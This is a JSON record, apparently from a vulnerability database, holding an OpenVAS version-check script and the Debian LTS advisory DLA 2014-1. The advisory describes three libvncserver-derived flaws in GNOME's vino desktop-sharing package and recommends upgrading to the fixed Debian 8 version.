"href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892014", "title": "Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892014\");\n script_version(\"2019-11-30T03:00:09+0000\");\n script_cve_id(\"CVE-2014-6053\", \"CVE-2018-7225\", \"CVE-2019-15681\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/11/msg00032.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2014-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/945784\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'vino'\n package(s) announced via the DSA-2014-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Several vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\nThe rfbProcessClientNormalMessage function in\nlibvncserver/rfbserver.c in LibVNCServer did not properly handle\nattempts to send a large amount of ClientCutText data, which allowed\nremote attackers to cause a denial of service (memory consumption or\ndaemon crash) via a crafted message that was processed by using a\nsingle unchecked malloc.\n\nCVE-2018-7225\n\nAn issue was discovered in LibVNCServer.\nrfbProcessClientNormalMessage() in rfbserver.c did not sanitize\nmsg.cct.length, leading to access to uninitialized and potentially\nsensitive data or possibly unspecified other impact (e.g., an integer\noverflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\nLibVNC contained a memory leak (CWE-655) in VNC server code, which\nallowed an attacker to read stack memory and could be abused for\ninformation disclosure. Combined with another vulnerability, it could\nbe used to leak stack memory and bypass ASLR. This attack appeared to\nbe exploitable via network connectivity.\");\n\n script_tag(name:\"affected\", value:\"'vino' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"vino\", ver:\"3.14.0-2+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-11-29T22:14:35", "bulletinFamily": "unix", "description": "Package : vino\nVersion : 3.14.0-2+deb8u1\nCVE ID : CVE-2014-6053 CVE-2018-7225 CVE-2019-15681\nDebian Bug : 945784\n\n\nSeveral vulnerabilities have been identified in the VNC code of vino, a\ndesktop sharing utility for the GNOME desktop environment.\n\nThe vulnerabilities referenced below are issues that have originally been\nreported against Debian source package libvncserver. The vino source\npackage in Debian ships a custom-patched and stripped down variant of\nlibvncserver, thus some of libvncserver's security fixes required porting\nover.\n\nCVE-2014-6053\n\n The rfbProcessClientNormalMessage function in\n libvncserver/rfbserver.c in LibVNCServer did not properly handle\n attempts to send a large amount of ClientCutText data, which allowed\n remote attackers to cause a denial of service (memory consumption or\n daemon crash) via a crafted message that was processed by using a\n single unchecked malloc.\n\nCVE-2018-7225\n\n An issue was discovered in LibVNCServer.\n rfbProcessClientNormalMessage() in rfbserver.c did not sanitize\n msg.cct.length, leading to access to uninitialized and potentially\n sensitive data or possibly unspecified other impact (e.g., an integer\n overflow) via specially crafted VNC packets.\n\nCVE-2019-15681\n\n LibVNC contained a memory leak (CWE-655) in VNC server code, which\n allowed an attacker to read stack memory and could be abused for\n information disclosure. Combined with another vulnerability, it could\n be used to leak stack memory and bypass ASLR. This attack appeared to\n be exploitable via network connectivity.\n\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n3.14.0-2+deb8u1.\n\nWe recommend that you upgrade your vino packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n-- \n\nmike gabriel aka sunweaver (Debian Developer)\nfon: +49 (1520) 1976 148\n\nGnuPG Fingerprint: 9BFB AEE8 6C0A A5FF BF22 0782 9AF4 6B30 2577 1B31\nmail: sunweaver@debian.org, http://sunweavers.net\n", "modified": "2019-11-29T08:31:28", "published": "2019-11-29T08:31:28", "id": "DEBIAN:DLA-2014-1:AEDFD", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201911/msg00032.html", "title": "[SECURITY] [DLA 2014-1] vino security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
